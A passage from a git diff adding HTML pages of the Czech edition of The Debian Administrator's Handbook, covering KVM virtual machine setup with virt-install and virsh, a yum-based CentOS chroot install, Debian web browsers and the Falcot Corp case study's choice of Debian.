+                          alt="3" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--name</code> option defines a (unique) name for the virtual machine.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.ram"><img
+                          class="callout"
+                          src="Common_Content/images/4.png"
+                          alt="4" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--ram</code> option allows specifying the amount of RAM (in MB) to allocate for the virtual machine.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.disk"><img
+                          class="callout"
+                          src="Common_Content/images/5.png"
+                          alt="5" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--disk</code> specifies the location of the image file that is to represent our virtual machine's hard disk; that file is created, unless present, with a size (in GB) specified by the <code
+                        class="literal">size</code> parameter. The <code
+                        class="literal">format</code> parameter allows choosing among several ways of storing the image file. The default format (<code
+                        class="literal">raw</code>) is a single file exactly matching the disk's size and contents. We picked a more advanced format here, that is specific to QEMU and allows starting with a small file that only grows when the virtual machine starts actually using space.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.cdrom"><img
+                          class="callout"
+                          src="Common_Content/images/6.png"
+                          alt="6" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--cdrom</code> option is used to indicate where to find the optical disk to use for installation. The path can be either a local path for an ISO file, an URL where the file can be obtained, or the device file of a physical CD-ROM drive (i.e. <code
+                        class="literal">/dev/cdrom</code>).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.network"><img
+                          class="callout"
+                          src="Common_Content/images/7.png"
+                          alt="7" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--network</code> specifies how the virtual network card integrates in the host's network configuration. The default behavior (which we explicitly forced in our example) is to integrate it into any pre-existing network bridge. If no such bridge exists, the virtual machine will only reach the physical network through NAT, so it gets an address in a private subnet range (192.168.122.0/24).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.vnc"><img
+                          class="callout"
+                          src="Common_Content/images/8.png"
+                          alt="8" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							<code
+                        class="literal">--vnc</code> states that the graphical console should be made available using VNC. The default behavior for the associated VNC server is to only listen on the local interface; if the VNC client is to be run on a different host, establishing the connection will require setting up an SSH tunnel (see <a
+                        class="xref"
+                        href="sect.remote-login.html#sect.ssh-port-forwarding">9.2.1.3 – „Creating Encrypted Tunnels with Port Forwarding“</a>). Alternatively, the <code
+                        class="literal">--vnclisten=0.0.0.0</code> can be used so that the VNC server is accessible from all interfaces; note that if you do that, you really should design your firewall accordingly.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.os"><img
+                          class="callout"
+                          src="Common_Content/images/9.png"
+                          alt="9" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--os-type</code> and <code
+                        class="literal">--os-variant</code> options allow optimizing a few parameters of the virtual machine, based on some of the known features of the operating system mentioned there.
+						</div></td></tr></table></div><div
+              class="para">
+					At this point, the virtual machine is running, and we need to connect to the graphical console to proceed with the installation process. If the previous operation was run from a graphical desktop environment, this connection should be automatically started. If not, or if we operate remotely, <code
+                class="command">virt-viewer</code> can be run from any graphical environment to open the graphical console (note that the root password of the remote host is asked twice because the operation requires 2 SSH connections):
+				</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>virt-viewer --connect qemu+ssh://root@<em
+                    class="replaceable">server</em>/system testkvm
+</code></strong><code
+                class="computeroutput">root@server's password: 
+root@server's password: </code></pre><div
+              class="para">
+					When the installation process ends, the virtual machine is restarted, now ready for use.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.9"></a>12.2.3.4. Managing Machines with <code
+                      class="command">virsh</code></h4></div></div></div><a
+              id="id-1.15.5.14.9.2"
+              class="indexterm"></a><div
+              class="para">
+					Now that the installation is done, let us see how to handle the available virtual machines. The first thing to try is to ask <code
+                class="command">libvirtd</code> for the list of the virtual machines it manages:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virsh -c qemu:///system list --all
+ Id Name                 State
+----------------------------------
+  - testkvm              shut off
+</code></strong></pre><div
+              class="para">
+					Let's start our test virtual machine:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virsh -c qemu:///system start testkvm
+</code></strong><code
+                class="computeroutput">Domain testkvm started</code></pre><div
+              class="para">
+					We can now get the connection instructions for the graphical console (the returned VNC display can be given as parameter to <code
+                class="command">vncviewer</code>):
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virsh -c qemu:///system vncdisplay testkvm
+</code></strong><code
+                class="computeroutput">:0</code></pre><div
+              class="para">
+					Other available <code
+                class="command">virsh</code> subcommands include:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">reboot</code> to restart a virtual machine;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">shutdown</code> to trigger a clean shutdown;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">destroy</code>, to stop it brutally;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">suspend</code> to pause it;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">resume</code> to unpause it;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">autostart</code> to enable (or disable, with the <code
+                      class="literal">--disable</code> option) starting the virtual machine automatically when the host starts;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">undefine</code> to remove all traces of the virtual machine from <code
+                      class="command">libvirtd</code>.
+						</div></li></ul></div><div
+              class="para">
+					All these subcommands take a virtual machine identifier as a parameter.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.10"></a>12.2.3.5. Installing an RPM based system in Debian with yum</h4></div></div></div><div
+              class="para">
+					If the virtual machine is meant to run a Debian (or one of its derivatives), the system can be initialized with <code
+                class="command">debootstrap</code>, as described above. But if the virtual machine is to be installed with an RPM-based system (such as Fedora, CentOS or Scientific Linux), the setup will need to be done using the <code
+                class="command">yum</code> utility (available in the package of the same name).
+				</div><div
+              class="para">
+					The procedure requires using <code
+                class="command">rpm</code> to extract an initial set of files, including notably <code
+                class="command">yum</code> configuration files, and then calling <code
+                class="command">yum</code> to extract the remaining set of packages. But since we call <code
+                class="command">yum</code> from outside the chroot, we need to make some temporary changes. In the sample below, the target chroot is <code
+                class="filename">/srv/centos</code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>rootdir="/srv/centos"
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>mkdir -p "$rootdir" /etc/rpm
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>echo "%_dbpath /var/lib/rpm" &gt; /etc/rpm/macros.dbpath
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>wget http://mirror.centos.org/centos/7/os/x86_64/Packages/centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>rpm --nodeps --root "$rootdir" -i centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</code></strong><code
+                class="computeroutput">rpm: RPM should not be used directly install RPM packages, use Alien instead!
+rpm: However assuming you know what you are doing...
+warning: centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
+# </code><strong
+                class="userinput"><code>sed -i -e "s,gpgkey=file:///etc/,gpgkey=file://${rootdir}/etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>yum --assumeyes --installroot $rootdir groupinstall core
+</code></strong><code
+                class="computeroutput">[...]
+# </code><strong
+                class="userinput"><code>sed -i -e "s,gpgkey=file://${rootdir}/etc/,gpgkey=file:///etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</code></strong></pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="advanced-administration.html"><strong>Předcházející</strong>Kapitola 12. Advanced Administration</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automated-installation.html"><strong>Další</strong>12.3. Automated Installation</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.web-browsers.html b/tmp/cs-CZ/html/sect.web-browsers.html
new file mode 100644
index 000000000..4fbc50f4a
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.web-browsers.html
@@ -0,0 +1,180 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.5. Web Browsers</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.main-desktop-tools.html"
+        title="13.4. Email" /><link
+        rel="next"
+        href="sect.development.html"
+        title="13.6. Development" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.web-browsers.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.main-desktop-tools.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.development.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.web-browsers"></a>13.5. Web Browsers</h2></div></div></div><a
+          id="id-1.16.8.2"
+          class="indexterm"></a><a
+          id="id-1.16.8.3"
+          class="indexterm"></a><div
+          class="para">
+			Epiphany, the web browser in the GNOME suite, uses the WebKit display engine developed by Apple for its Safari browser. The relevant package is <span
+            class="pkg pkg">epiphany-browser</span>.
+		</div><a
+          id="id-1.16.8.5"
+          class="indexterm"></a><a
+          id="id-1.16.8.6"
+          class="indexterm"></a><div
+          class="para">
+			Konqueror, available in the <span
+            class="pkg pkg">konqueror</span> package, is KDE's web browser (but can also assume the role of a file manager). It uses the KDE-specific KHTML rendering engine; KHTML is an excellent engine, as witnessed by the fact that Apple's WebKit is based on KHTML. <a
+            id="id-1.16.8.7.2"
+            class="indexterm"></a>
+		</div><div
+          class="para">
+			Users not satisfied by either of the above can use Firefox. This browser, available in the <span
+            class="pkg pkg">firefox-esr</span> package, uses the Mozilla project's Gecko renderer, with a thin and extensible interface on top. <a
+            id="id-1.16.8.8.2"
+            class="indexterm"></a> <a
+            id="id-1.16.8.8.3"
+            class="indexterm"></a> <a
+            id="id-1.16.8.8.4"
+            class="indexterm"></a>
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.16.8.9"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/firefox.png"
+                alt="The Firefox web browser" /></div></div><p
+            class="title"><strong>Obrázek 13.7. The Firefox web browser</strong></p></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Firefox ESR</strong></p></div></div></div><a
+            id="id-1.16.8.10.2"
+            class="indexterm"></a><div
+            class="para">
+			Mozilla has a very fast-paced release cycle for Firefox. New releases are published every six to eight weeks and only the latest version is supported for security issues. This doesn't suit all kind of users so, every 10 cycles, they are promoting one of their release to an <span
+              class="emphasis"><em>Extended Support Release</em></span> (ESR) which will get security updates (and no functional changes) during the next 10 cycles (which covers a bit more than a year).
+		</div><div
+            class="para">
+			Debian has both versions packaged. The ESR one, in the package <span
+              class="pkg pkg">firefox-esr</span>, is used by default since it is the only version suitable for Debian <span
+              class="distribution distribution">Stable</span> with its long support period (and even there Debian has to upgrade from one ESR release to the next multiple times during a Debian Stable lifecycle). The regular Firefox is available in the <span
+              class="pkg pkg">firefox</span> package but it is only available to users of Debian <span
+              class="distribution distribution">Unstable</span>.
+		</div></div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.firefox-iceweasel"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>CULTURE</em></span> Iceweasel, Firefox and others</strong></p></div></div></div><a
+            id="id-1.16.8.11.2"
+            class="indexterm"></a><a
+            id="id-1.16.8.11.3"
+            class="indexterm"></a><div
+            class="para">
+			Before Debian <span
+              class="distribution distribution">Stretch</span>, Firefox and Thunderbird were missing. The <span
+              class="pkg pkg">iceweasel</span> package contained Iceweasel, which was basically Firefox under another name.
+		</div><div
+            class="para">
+			The rationale behind this renaming was a result of the usage rules imposed by the Mozilla Foundation on the <span
+              class="trademark">Firefox</span>™ registered trademark: any software named Firefox had to use the official Firefox logo and icons. However, since these elements are not released under a free license, Debian could not distribute them in its <span
+              class="emphasis"><em>main</em></span> section. Rather than moving the whole browser to <span
+              class="emphasis"><em>non-free</em></span>, the package maintainer choose to use a different name.
+		</div><div
+            class="para">
+			For similar reasons, the <span
+              class="trademark">Thunderbird</span>™ email client was renamed to Icedove in a similar fashion.
+		</div><div
+            class="para">
+			Nowadays, the logo and icons are distributed under a free software license and Mozilla recognized that the changes made by the Debian project are respecting their trademark license so Debian is again able to ship Mozilla's applications under their official name.
+		</div></div><a
+          id="id-1.16.8.12"
+          class="indexterm"></a><a
+          id="id-1.16.8.13"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>CULTURE</em></span> Mozilla</strong></p></div></div></div><div
+            class="para">
+			Netscape Navigator was the standard browser when the web started reaching the masses, but lost ground when Microsoft bundled Internet Explorer with Windows and signed contracts with computer manufacturers which forbade them from pre-installing Netscape Navigator. Faced with this failure, Netscape (the company) decided to “free” its source code, by releasing it under a free license, to give it a second life. This was the beginning of the Mozilla project. After many years of development, the results are more than satisfying: the Mozilla project brought forth an HTML rendering engine (called Gecko) that is among the most standard-compliant. This rendering engine is in particular used by the Mozilla Firefox browser, which is one of the most successful browsers, with a fast-growing user base.
+		</div><a
+            id="id-1.16.8.14.3"
+            class="indexterm"></a><a
+            id="id-1.16.8.14.4"
+            class="indexterm"></a></div><div
+          class="para">
+			Last but not least, Debian also contains the <span
+            class="emphasis"><em>Chromium</em></span> web browser (available in the <span
+            class="pkg pkg">chromium</span> package). This browser is developed by Google at such a fast pace that maintaining a single version of it across the whole lifespan of Debian <span
+            class="distribution distribution">Stretch</span> is unlikely to be possible. Its clear purpose is to make web services more attractive, both by optimizing the browser for performance and by increasing the user's security. The free code that powers Chromium is also used by its proprietary version called Google Chrome.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.main-desktop-tools.html"><strong>Předcházející</strong>13.4. Email</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.development.html"><strong>Další</strong>13.6. Development</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.who-is-this-book-for.html b/tmp/cs-CZ/html/sect.who-is-this-book-for.html
new file mode 100644
index 000000000..500eacaa9
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.who-is-this-book-for.html
@@ -0,0 +1,85 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2. Pro koho je tato kniha?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="next"
+        href="sect.selected-approach.html"
+        title="3. Obecný přístup" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.who-is-this-book-for.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="foreword.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selected-approach.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.who-is-this-book-for"></a>2. Pro koho je tato kniha?</h2></div></div></div><div
+          class="para">
+			Snažili jsme se, aby tato kniha byla užitečná pro více kategorií čtenářů. Zaprvé, správci systémů (začátečníci i zkušení) najdou vysvětlení instalace a nasazení Debianu na více počítačích. Budou mít také přehled o většině služeb, které jsou v Debianu k dispozici, spolu s odpovídajícími konfiguračními pokyny a popisem specifik pocházejících z distribuce. Pochopení mechanismů, použitých při vývoji Debianu, jim umožní vypořádat se s nepředvídanými problémy, s tím, že mohou vždy najít pomoc v rámci komunity.
+		</div><div
+          class="para">
+			Uživatelé jiné linuxové distribuce nebo jiné varianty Unixu objevoví specifika Debianu a měli by být velmi rychle akceschopní a zároveň plně těžit z jedinečných výhod této distribuce.
+		</div><div
+          class="para">
+			A konečně, čtenáři, kteří již mají nějaké znalosti o Debianu a chtějí se dozvědět více o komunitě stojící za ním by měli mít svá očekávání naplněna. Tato kniha by je měla přiblížit k tomu se k nám připojit a stát se přispěvateli.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="foreword.html"><strong>Předcházející</strong>Předmluva</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selected-approach.html"><strong>Další</strong>3. Obecný přístup</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.why-debian-stable.html b/tmp/cs-CZ/html/sect.why-debian-stable.html
new file mode 100644
index 000000000..712dce743
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.why-debian-stable.html
@@ -0,0 +1,86 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.5. Why Debian Stretch?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="sect.why-debian.html"
+        title="2.4. Why the Debian Distribution?" /><link
+        rel="next"
+        href="existing-setup.html"
+        title="Kapitola 3. Analyzing the Existing Setup and Migrating" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.why-debian-stable.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="existing-setup.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.why-debian-stable"></a>2.5. Why Debian Stretch?</h2></div></div></div><div
+          class="para">
+			Every Debian release starts its life as a continuously changing distribution, also known as “<span
+            class="distribution distribution">Testing</span>”. But at the time we write those lines, Debian Stretch is the latest “<span
+            class="distribution distribution">Stable</span>” version of Debian.
+		</div><div
+          class="para">
+			The choice of Debian Stretch is well justified based on the fact that any administrator concerned about the quality of their servers will naturally gravitate towards the stable version of Debian. Even if the previous stable release might still be supported for a while, Falcot administrators aren't considering it because its support period will not last long enough and because the latest version brings new interesting features that they care about.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian.html"><strong>Předcházející</strong>2.4. Why the Debian Distribution?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="existing-setup.html"><strong>Další</strong>Kapitola 3. Analyzing the Existing Setup and Migr...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.why-debian.html b/tmp/cs-CZ/html/sect.why-debian.html
new file mode 100644
index 000000000..e94d849a9
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.why-debian.html
@@ -0,0 +1,155 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.4. Why the Debian Distribution?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="sect.why-gnu-linux.html"
+        title="2.3. Why a GNU/Linux Distribution?" /><link
+        rel="next"
+        href="sect.why-debian-stable.html"
+        title="2.5. Why Debian Stretch?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.why-debian.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-gnu-linux.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian-stable.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.why-debian"></a>2.4. Why the Debian Distribution?</h2></div></div></div><div
+          class="para">
+			Once the Linux family has been selected, a more specific option must be chosen. Again, there are plenty of criteria to consider. The chosen distribution must be able to operate for several years, since the migration from one to another would entail additional costs (although less than if the migration were between two totally different operating systems, such as Windows or OS X).
+		</div><div
+          class="para">
+			Sustainability is, thus, essential, and it must guarantee regular updates and security patches over several years. The timing of updates is also significant, since, with so many machines to manage, Falcot Corp can not handle this complex operation too frequently. The IT department, therefore, insists on running the latest stable version of the distribution, benefiting from the best technical assistance, and guaranteed security patches. In effect, security updates are generally only guaranteed for a limited duration on older versions of a distribution.
+		</div><div
+          class="para">
+			Finally, for reasons of homogeneity and ease of administration, the same distribution must run on all the servers and office computers.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.5.8.5"></a>2.4.1. Commercial and Community Driven Distributions</h3></div></div></div><div
+            class="para">
+				There are two main categories of Linux distributions: commercial and community driven. The former, developed by companies, are sold with commercial support services. The latter are developed according to the same open development model as the free software of which they are comprised.
+			</div><div
+            class="para">
+				A commercial distribution will have, thus, a tendency to release new versions more frequently, in order to better market updates and associated services. Their future is directly connected to the commercial success of their company, and many have already disappeared (Caldera Linux, StormLinux, Mandriva Linux, etc.).
+			</div><div
+            class="para">
+				A community distribution doesn't follow any schedule but its own. Like the Linux kernel, new versions are released when they are stable, never before. Its survival is guaranteed, as long as it has enough individual developers or third party companies to support it.
+			</div><a
+            id="id-1.5.8.5.5"
+            class="indexterm"></a><a
+            id="id-1.5.8.5.6"
+            class="indexterm"></a><div
+            class="para">
+				A comparison of various Linux distributions led to the choice of Debian for various reasons:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						It is a community distribution, with development ensured independently from any commercial constraints; its objectives are, thus, essentially of a technical nature, which seem to favor the overall quality of the product.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Of all community distributions, it is the most significant from many perspectives: in number of contributors, number of software packages available, and years of continuous existence. The size of its community is an incontestable witness to its continuity.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Statistically, new versions are released every 18 to 24 months, and they are supported for 5 years, a schedule which is agreeable to administrators.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						A survey of several French service companies specialized in free software has shown that all of them provide technical assistance for Debian; it is also, for many of them, their chosen distribution, internally. This diversity of potential providers is a major asset for Falcot Corp's independence.
+					</div></li><li
